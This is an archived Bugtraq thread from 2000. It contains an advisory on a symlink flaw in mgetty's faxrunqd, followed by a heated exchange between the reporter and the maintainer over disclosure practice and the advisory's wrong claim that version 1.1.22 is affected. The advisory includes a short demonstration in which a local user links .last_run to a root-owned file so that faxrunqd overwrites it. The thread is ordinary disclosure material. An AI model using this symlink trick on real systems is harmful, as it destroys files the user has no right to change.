5400571 2000-08-26 09:16 /88 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12410>
Ärende: Advisory: mgetty local compromise
------------------------------------------------------------
From: Stan Bubrouski <satan@FASTDIAL.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <4.3.1.2.20000826015347.00b8e220@pop.crosswinds.net>
Author : Stan Bubrouski
Date : August 26, 2000
Package : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity : faxrunqd follows symbolic links when creating
certain files. The default location
for the files is /var/spool/fax/outgoing,
which is a world-writable directory. Local
users can destroy the contents of any
file on a mounted filesystem because faxrunqd is
usually run by root.
Problem : mgetty comes with a program named faxrunqd, which is
a daemon to send fax jobs queued
by faxspool(1). Upon successful
execution, a file named .last_run is created in the
/var/spool/fax/outgoing/ directory which
is world-writable. The problem lies in the
fact faxrunqd will follow symlinks
created by any user, allowing file creation anywhere
and allowing existing files to be
overwritten/destroyed.
Example:
Remote unprivilaged user:
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$
Believed to be vulnerable:
Red Hat Linux 6.2 and all prior versions (Vulnerable)
Linux-Mandrake 7.1 and all prior versions (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1 (Untested)
LinuxPPC 1999 and 2000 (Untested)
TurboLinux 4.0, 6.0 (Untested)
Debian 2.2 (potato), 2.1 (slink) (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2 (Untested)
MkLinux Pre Release 1 (R1) (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4 (Untested)
Think Blue Linux 1.0 (Linux for the S/390) (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...
Believed to be unaffected:
SuSE - all versions
Slackware - all versions
(5400571) ------------------------------------------(Ombruten)
Kommentar i text 5402206 av Brevbäraren (som är implementerad i) Python
5402206 2000-08-26 22:19 /56 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12414>
Kommentar till text 5400571 av Brevbäraren (som är implementerad i) Python
Ärende: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Gert Doering <gert@GREENIE.MUC.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000826110209.A17587@greenie.muc.de>
Hi,
aren't there things you *REALLY* hate? This is one of them.
On Sat, Aug 26, 2000 at 02:23:05AM -0400, Stan Bubrouski wrote:
> Author : Stan Bubrouski
> Date : August 26, 2000
> Package : mgetty
> Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
> Severity : faxrunqd follows symbolic links when creating
> certain files. The default location for the files is /var/spool/fax/outgoing,
> which is a world-writable directory. Local users can destroy the contents
> of any file on a mounted filesystem because faxrunqd is usually run by root.
>
> Problem : mgetty comes with a program named faxrunqd, which is
> a daemon to send fax jobs queued by faxspool(1). Upon successful execution,
> a file named .last_run is created in the /var/spool/fax/outgoing/
> directory which is world-writable. The problem lies in the fact faxrunqd
> will follow symlinks created by any user, allowing file creation anywhere
> and allowing existing files to be overwritten/destroyed.
First of all, this hole does NOT exist anymore in 1.1.22. It has been
reported to me by the FreeBSD people, and closed on August 14, 2000.
1.1.22 has been released on August 17, 2000, and can be found on the
usual places (http://alpha.greenie.net/mgetty/).
So, please, get your facts right before posting.
Second, I am really annoyed to find this on bugtraq, with false data,
without any prior contact. The fact that I just released 1.1.22
should give you enough hint that I am still maintaining mgetty, and
sending me a quick mal "hey, is this bug still open?" would have been
in order.
Also, it would have saved *you* the embarrassment to report something
to bugtraq that is already fixed.
Vendor releases might still be vulnerable (shipping old versions),
but as faxrunqd(8) isn't usually run by default, a "standard system"
should NOT be vulnerable. *If* you run faxrunqd, though, upgrade to
1.1.22 (but those of you that do, you know who you are...)
gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany gert@greenie.muc.de
fax: +49-89-35655025 gert.doering@physik.tu-muenchen.de
(5402206) ------------------------------------------(Ombruten)
Kommentar i text 5402257 av Brevbäraren (som är implementerad i) Python
Kommentar i text 5402267 av Brevbäraren (som är implementerad i) Python
5402257 2000-08-26 22:54 /34 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12415>
Kommentar till text 5402206 av Brevbäraren (som är implementerad i) Python
Ärende: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Gert Doering <gert@GREENIE.MUC.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000826120951.A18596@greenie.muc.de>
Hi,
sorry to followup on myself, but...:
On Sat, Aug 26, 2000 at 11:02:09AM +0200, Gert Doering wrote:
> Vendor releases might still be vulnerable (shipping old versions), but as
> faxrunqd(8) isn't usually run by default, a "standard system" should NOT
> be vulnerable. *If* you run faxrunqd, though, upgrade to 1.1.22 (but
> those of you that do, you know who you are...)
... this is crap. faxrunq(8) had the same bug as faxrunqd(8) here
(which the original "advisory" didn't mention). It has also been
fixed in 1.1.22.
So, let me rephrase this: IF you are using the "sendfax" part of
mgetty+sendfax AND you have possibly-malicious users on your system,
then you should urgently upgrade to 1.1.22 (which should be a matter
of "make; make install").
If all your users are trustworthy, you don't have a problem, as this
can't be remotely exploited.
gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany gert@greenie.muc.de
fax: +49-89-35655025 gert.doering@physik.tu-muenchen.de
(5402257) ------------------------------------------(Ombruten)
5402267 2000-08-26 23:02 /94 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12418>
Kommentar till text 5402206 av Brevbäraren (som är implementerad i) Python
Ärende: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Stan Bubrouski <satan@FASTDIAL.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <39A7D80F.ABB4289C@fastdial.net>
Gert Doering wrote:
> Hi,
>
> aren't there things you *REALLY* hate? This is one of them.
>
Hate is strong word. Mistakes are mistakes. Move on. If you really
hate things so much why not post them yourself to save others the
trouble of reporting the problem? You know this ships with most of
the most popular linux distributions, so chances are that people are
affected by this.
>
> On Sat, Aug 26, 2000 at 02:23:05AM -0400, Stan Bubrouski wrote:
> > Author : Stan Bubrouski
> > Date : August 26, 2000
> > Package : mgetty
> > Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
> > Severity : faxrunqd follows symbolic links when creating
> > certain files. The default location for the files is /var/spool/fax/outgoing,
> > which is a world-writable directory. Local users can destroy the contents
> > of any file on a mounted filesystem because faxrunqd is usually run by root.
> >
> > Problem : mgetty comes with a program named faxrunqd, which is
> > a daemon to send fax jobs queued by faxspool(1). Upon successful execution,
> > a file named .last_run is created in the /var/spool/fax/outgoing/
> > directory which is world-writable. The problem lies in the fact faxrunqd
> > will follow symlinks created by any user, allowing file creation anywhere
> > and allowing existing files to be overwritten/destroyed.
>
> First of all, this hole does NOT exist anymore in 1.1.22. It has been
> reported to me by the FreeBSD people, and closed on August 14, 2000.
>
Yeah and this report was constructed based on what I wrote on June 2nd
and was subsequently ignored.
>
> 1.1.22 has been released on August 17, 2000, and can be found on the usual
> places (http://alpha.greenie.net/mgetty/).
>
Yeah I know. It was an error. I meant to put that in a "Versions
unaffected:" row, but for some reason left on the same line as
unaffected. See I had actually reported this to bugtraq over two
months ago, and only one vendor addressed the problem and they did it
covertly so nobody knew. It didn't help either that when I made the
original report I had it listed in a message explaining compromises
on Red Hat Linux 6.2 and so the scope of the problem was never
recognized. I only made this report to clarify the vulnerability and
because it had now been fixed. My original report was to Red Hat on
June 2, 2000. It's the same as in the advisory except it only shows
how it is a problem. That is at
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=11874
>
> So, please, get your facts right before posting.
>
> Second, I am really annoyed to find this on bugtraq, with false data,
> without any prior contact. The fact that I just released 1.1.22 should
> give you enough hint that I am still maintaining mgetty, and sending me a
> quick mal "hey, is this bug still open?" would have been in order.
>
> Also, it would have saved *you* the embarrassment to report something to
> bugtraq that is already fixed.
Not sure I understand this. I thought thats what vendors usually
want. A report on a vulnerability after a patch or fix is available.
If this is not the case please let me know, I have scathing holes in
other software that are not public because they have yet to be fixed.
Get real. I don't get embarressed by a simple typo, do you?
>
> Vendor releases might still be vulnerable (shipping old versions), but as
> faxrunqd(8) isn't usually run by default, a "standard system" should NOT
> be vulnerable. *If* you run faxrunqd, though, upgrade to 1.1.22 (but
> those of you that do, you know who you are...)
>
> gert
> --
> USENET is *not* the non-clickable part of WWW!
> //www.muc.de/~gert/
> Gert Doering - Munich, Germany gert@greenie.muc.de
> fax: +49-89-35655025 gert.doering@physik.tu-muenchen.de
Later.
Stan Bubrouski
(5402267) ------------------------------------------(Ombruten)
5402262 2000-08-26 22:56 /100 rader/ Brevbäraren (som är implementerad i) Python
Mottagare: Bugtraq (import) <12417>
Ärende: Re: Advisory: mgetty local compromise
------------------------------------------------------------
From: Gert Doering <gert@GREENIE.MUC.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20000826165612.H20258@greenie.muc.de>
Hi,
On Sat, Aug 26, 2000 at 10:45:35AM -0400, Stan Bubrouski wrote:
> > On Sat, Aug 26, 2000 at 02:23:05AM -0400, Stan Bubrouski wrote:
> > > Author : Stan Bubrouski
> > > Date : August 26, 2000
> > > Package : mgetty
> > > Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
[..]
> > First of all, this hole does NOT exist anymore in 1.1.22. It has been
> > reported to me by the FreeBSD people, and closed on August 14, 2000.
>
> Yeah and this report was constructed based on what I wrote on June 2nd
> and was subsequently ignored.
You never reported it to *me*. It's pretty clear from all the
documentation that I wrote mgetty+sendfax and still maintain it.
You reported it to "some Linux vendor" (which is good, indeed, but
not sufficient). Actually, if you look at the bugzilla ID that you
quote, you see that I did respond to it, after one of the FreeBSD
crowd pointed me to it.
> > 1.1.22 has been released on August 17, 2000, and can be found on the usual
> > places (http://alpha.greenie.net/mgetty/).
>
> Yeah I know. It was an error. I meant to put that in a "Versions unaffected:"
> row, but for some reason left on the same line as unaffected.
*sigh*
> See I had actually reported this to bugtraq over two months ago,
You haven't.
You have reported this to RedHat's "bugzilla" database, which is
something completely different.
Checking the bugtraq archives, there are exactly two articles
containing the word "faxrunq". Both are written by me, in July 1997
- seems that your article from today is not yet indexed. Other
articles from July this year are certainly visible.
> and only one vendor addressed
> the problem and they did it covertly so nobody knew.
The "vendor" of mgetty+sendfax is *me*. You have not notified me, or
the mgetty mailing list.
[..]
> I only made this report to clarify the vulnerability and because it had now been
> fixed.
In that case, please re-read the stuff before you post. What you did
was to cause much fuzz, much panic ("what, 1.1.22 vulnerable as
well?"), and no good.
The fact that there was this bug in 1.1.21 has been clearly reported
in the mgetty list (and it's in the ChangeLog), and Linux
distribution vendors usually pick up new releases quite quickly, so
they should have fixed versions available RSN.
[..]
> > Second, I am really annoyed to find this on bugtraq, with false data,
> > without any prior contact. The fact that I just released 1.1.22 should
> > give you enough hint that I am still maintaining mgetty, and sending me a
> > quick mal "hey, is this bug still open?" would have been in order.
>
> Not sure I understand this. I thought thats what vendors usually want.
> A report on a vulnerability after a patch or fix is available.
Huh? Vendors want the report on the vulnerability when you know
about a problem, to be able to *develop* a fix.
How do you think a vendor can develop a fix if you don't tell 'em?
(Maybe we have different views what a "vendor" is. For
mgetty+sendfax, I am, as the main author and coordinator).
> If this is not
> the case please let me know, I have scathing holes in other software that
> are not public because they have yet to be fixed. Get real.
> I don't get embarressed by a simple typo, do you?
You better should. Claiming publically that something is vulnerable, even
giving version numbers, when you really should know that it's fixed should
be embarassing. That's much more than a "simple typo".
gert
--
USENET is *not* the non-clickable part of WWW!
//www.muc.de/~gert/
Gert Doering - Munich, Germany gert@greenie.muc.de
fax: +49-89-35655025 gert.doering@physik.tu-muenchen.de
(5402262) ------------------------------------------(Ombruten)